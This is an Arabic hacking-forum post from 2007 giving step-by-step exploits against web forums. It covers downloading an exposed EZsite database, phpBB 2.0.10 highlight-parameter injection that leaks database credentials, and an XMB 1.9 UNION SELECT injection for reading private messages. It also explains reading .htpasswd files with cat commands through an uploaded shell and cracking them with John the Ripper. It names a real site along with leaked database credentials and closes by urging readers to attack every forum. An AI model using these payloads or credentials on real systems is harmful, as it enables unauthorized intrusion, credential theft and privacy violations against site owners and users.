GAME OVER
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

GAME OVER


 
الرئيسيةالتسجيلأحدث الصوردخول

 

 ثغره سهل جداااااا

اذهب الى الأسفل 
كاتب الموضوعرسالة
•IîI•T3bk Rà7H•IîI•.
مشرف
مشرف



المساهمات : 51
تاريخ التسجيل : 18/09/2007

ثغره سهل جداااااا Empty
مُساهمةموضوع: ثغره سهل جداااااا   ثغره سهل جداااااا Icon_minitimeالخميس سبتمبر 20, 2007 6:02 pm

انا اليوم اقدم اكبر مكتبة ثغرات في منتدي العاصفة
اول شئ

بسم الله الرحمن الرحيم

كيف الحال انشالله بخير الجميع ؟؟؟؟؟؟؟؟؟؟


انا اليوم جايب لكم ثغرة سهله جداً جداً الثغرة اسمها EZsite forum
يعني ما تأخذ من وقتك شي جربوها انتم .

بسم الله نبدا الشرح

المهم الحين بشرحها وابيكم تطبقوا بس على فكره لما تدخل لوحه التحكم يعني يبي لك تدور ولما تبي تغير الباسورد يكون اخر خيار على يدك اليسار اوووووكيك تفضل الشرح :


ادخل على محرك البحث قوقل Google

بعدين ابحث عن هذه الثغرة

EZsite Forum
يعني نزلها بمحرك قوقل


بتطلع مواقع كثيره

نعطيك مثال
http://www.×××××××.com/forum/

طلع لنا هذا الموقع

نضع بعد كلمةforum هذه الوصلهDatabase/EZsiteForum.mdb

يعني يصير الموقع كذى
http://www.×××××.com/forum/Database/EZsiteForum.mdb
نضغط انتر

بيطلع لنا تحميل قاعدة البيانات


ندور على اليوزر نيم والباسوورد
بعد مانحصلها

نروح للموقع

ونكتب بعد http://×××××.com/forum
ForumManager.asp

يعني يصير الموقع كذى
http://×××××.com/forum/ForumManager.asp

تطلع لنا لوحة التحكم نكتب فيها الباسوورد واليوزر نيم الى اخذناه من لوحة التحكم

وعلى كذى نخترق الموقع

هاه وش رايكم بالشرح

ما قلت لكم سهلة ما بقى عليكم الى التجربة

الثغرة الثانية:


بسم الله الرحمن الرحيم

هلا يا شباب
طبعا اخونا hazimal نزل الثغرة وشرح لها بس استخدامها أو اثتمارها ضعيف جداً وهو إحتمال كون باسورد قاعدة البيانات هى باسورد الإف تى بى علشان ترفع الشل وتخترق

السؤال ليه نستخدم الإف تى بى لرفع الشيل ونسبة إن الباسورد للقاعدة تكون نفس باسورد الإف تى هى 40%
أما قاعدة البيانات فالنسبة هى 100% لإن هذه البيانات الى تظهر لنا هى بيانات قاعدة البيانات
وإن لم يتم الإتصال فهذا يعود للبرنامج المستخدم فى الإتصال بالقاعدة وراح اقدم بكم برنامج يتصل بأغلب نظم القواعد

ولو كانت فعلا الإف تى بى يبقى ريحتنا من الشغل
لكن لو مش هيا يبقى نسيب المنتدى المصاب بالثغرة الخطيرة دى ؟؟

وفى تعليق بسيط على شرح أخوى hazimal هو إن الكود المستخدم لمعرفة إسم المستخدم هو dbuser وليس dbname لإن هذا الأخير لمعرفة إسم قاعدة البيانات وليس اسم مستخدم قاعدة البيانات

وعلى العموم انا اليوم بقدم لكم إستثمار تانى للثغرة

ولثغرة هى من نوع إختراق قواعد البيانات
ولمن لايعلم لإختراق قاعدة البيانات لابد إننا نعرف 3 حاجات
1- اسم المستخدم User
2- كلمة المرور Password
3- موقع القاعدة dbHost

اسيبكم مع الشرح

البحث عن الهدف

نفتح أى محرك بحث وأنصح بالجوجل www.Google.com
ومفتاح البحث هو

Powered by phpBB 2.0.10




نختار أحد النتائج وفأر التجارب لهذا الشرح هو
http://familyenergy.com

المهم احنا دلوقتى عايزين نعرف اسم مستخدم قاعدة البيانات نضيف بعد رابط المنتدى الرابط التالى
viewtopic.php?p=44&highlight=%2527.$poster=$dbuser .%2527

ونضغط المفتاح إنتر
راح نلاقى ظهر لنا موضوع دلوقتى نركز فى اسم كاتب الموضوع هنلاقيه
family)\b#i

ناخد الى قبل القوس يبقى اسم المستخدم هو family

دلوقتى عايزن نعرف الباسورد نضيف الرابط التالى بعد مجلد المنتدى
viewtopic.php?p=44&highlight=%2527.$poster=$dbpass wd.%2527

خنلاقى الباسورد طلعت
unit101)\b#i



برضه ناخد الى قبل القوس تبقى الباسورد unit101

دلوقتى عايزين نعرف موقع قاعدة البيانات نضيف الرابط التالى
viewtopic.php?p=44&highlight=%2527.$poster=$dbhost .%2527

زى ما احنا شايفين طلع لنا
localhost)\b#i



ناخد برضه الى قبل القوس localhost
وده معناه إن القاعدة على نفس الموقع يبقى موقع القاعدة فى الحالة دى familyenergy.com

دلوقتى احنا معانا اليورز والباس والهوست يعنى نقدر نخترق قاعدة البيانات
أول حاجة لازم يكون معانا برنامج للإتصال بالقاعدة وفى برنامج انا بستخدمه اسمه Navicat




بعد التحميل والتنصيب افتحه هتلاقى صورة زى دى



1- تدوس عليها علشان تظهر لك نافذة الإتصال
2- إسم الإتصال اكتب أى اسم تحب
3- الهوست وزى ما جبناه هو familyenergy.com
4- البورت وده ثابت متغيروش
5- اسم المستخدم وزى ما جبناه family
6- الباسورد وزى ما جبناها unit101
7- دوس عليه علشان تتأكد من صحة الإتصال

إذا ظهر مبع يقولك Conection Successful يبقى مبروك عليك قاعدة بيانات الموقع



دوس Ok وارج هتلاقى ظهر لك على اليمين اسم الإتصال دوس عليه دبل كليك هتلاقى الإتصال بالقاعدة تم



دلوقتى ظهر لنا جداول كثير عايزين نعرف انهى واحد فيهم بتاع المنتدى

يبقى نرجع تانى للمنتدى ونحط بعد رابط مجلد المنتدى
viewtopic.php?p=44&highlight=%2527.$poster=$dbname .%2527

هنلاقى ظهر لنا
feboards)\b#i


يعنى اسم القاعدة feboards

ندور عليها فى القواعد الى عندنا وندوس عليها دبل كليك



هتلاقى ادامك كل جداول المنتدى ومبروك عليك

فى الجدول phpbb_users راح تلاقى كل أسماء المستخدمين والباسوردات المشفرة



فك التشفير أو استخدم برنامج سارق الكوكيز و كن الأدمن و ارفع الشل عن طريق الإبتسامات

لقفل الثغرة عليك بالترقية للنسخة الجديدة 2.0.11
وهذا رابط النسخة الجديدة
الثغرة الثالثة:



بسم الله الرحمن الرحيم





انا ماشفت احد شرح ثغرة Powered by XMB 1.9 Nexus



قلت بشرحها انا وان شاء الله تكون سهله



وهي فعلا سهله الثغره





ولكن ما راح تخترق المنتدى فقط تقدر تشوف رسائل الادمن الخاصه





اول شي روح الى قوقل او اي محرك بحث واكتب Powered by XMB 1.9 Nexus



www.google.com



راح تحصل منتديات كثير



ادخل اي واحد منهم وسجل فيه وضيف بعد عنوان المنتدى



member.php?action=viewpro&member=xp10&restrict=%20 f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9



غير كلمة xp10 الى اسم العضو او الادمن الي تبي تشوف رسائله الخاصه



والان بعد ماكتبت اسم الادمن او العضو الي تبي تشوفه رسائله روح الصق الرابط بعد عنوان المنتدى



الحين راح يطلع لنا الملف الشخصي



اضغط على كلمة (Saada U2U) وراح تفتح لك خيارات مثل مجموعة الرسائل







واختار الي يعجبك



اما اذا طلع لك هذا الكلام يعني لازم تسجل بالمنتدى



U2Ude lugemiseks ja saatmiseks pead sa olema sisse logitud.

الثغرة الرابعة:
السلام عليكم ورحمة الله وبركاته

اخواني راح اشرح لكم طريقة تخطي الاكسزز بالمنتديات

المسئلة تراها بسيطة وماهي اختراع ذرة

اول حاجة لابد يكون لديك شل على الموقع او على المنتدى

اوكي لو فرضنا الان عندك شل على موقع www.abc.com

وانت فاتح الشل وموقعك بالمسار هو

/home/abc/public_html/

اوكي تروح وتدخل على مسار المنتدى ( مجلد المنتدى) وراح يكون مسارك بالشكل هذا

/home/abc/public_html/vb/

وبعدها تنتقل الى مجلد الادمن الموجود في مجلد الـ vb وراح يكون مسارك بالشكل هذا

/home/abc/public_html/vb/admincp/


1. طبق الأمر التالي لعرض محتوى ملف .htaccess

والامر راح يكون بالشكل هذا

cat /home/abc/public_html/vb/admincp/.htaccess


الناتج سيكون مشابهاً لـ:
AuthType Basic

AuthName "Restricted Area"

AuthUserFile "/home/abc/.htpasswds/vb/admincp/passwd"


require valid-user


الي نبغاه من الملف هو محتوى سطر AuthUserFile

في هذا السطر.. نأخذ مابعد كلمة AuthUserFile والذي بين النقطتين الي بالشكل هذا

" "


في مثالنا راح يكون بالشكل هذا:
/home/abc/.htpasswds/vb/admincp/passwd

2. قم بتطبيق الأمر التالي:
cat /home/abc/.htpasswds/vb/admincp/passwd


الناتج راح يكون مشابهاً لـ:

adminTzTUzGTZXhYU


3. افتح المفكرة.. واكتب ماحصلنا عليه في الخطوة رقم (2) واحفظه في ملف في C:passwd.txt

4. تأكد من وجود برنامج john the ripper في جهازك.. (http://www.mirrors.wiretapped.net/se...r/john-16w.zip)
لنفرض أنك فكيت ضغط البرنامج في C:
سيكون هناك مجلد اسمه john-16 وداخله مجلد run
نفتح الدوس (Start->run: cmd)
وننفذ:
cd john-16run
ونضغط انتر.. ثم ننفذ الأمر التالي:
john C:passwd.txt
راح تطلع لنا رسالة كـ:
Loaded 1 password (Standard DES [24/32 4K])

ننتظر إلى أن ينتهي من فك كلمة المرور.. اذا تم فكها سوف يعطينا رسالة مشابهة لـ:
mahar (admin)
guesses: 1 time: 0:00:00:00 100% c/s: 512 trying: goober - braves

نعرف أنه قد خمن كلمة المرور وفكها.. كلمة المرور في المثال هي mahar
اذن:
اسم المستخدم: admin
وكلمة المرور: mahar


المثال هذا مطبقه على احد المنتديات وفكيته في وقت قياسي


يالله انفلتوا على المنتديات ولا تخلون احد في حالــــــــــــــــه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
ثغره سهل جداااااا
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغره من اكتشافي
» ثغره الدعم الفني
» حصريا ثغره الهوتميل
» ثغره سهله لا اختراق المواقع
» والله في ثغره دوختنييي

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
GAME OVER :: قسم اخر الثغرات-
انتقل الى: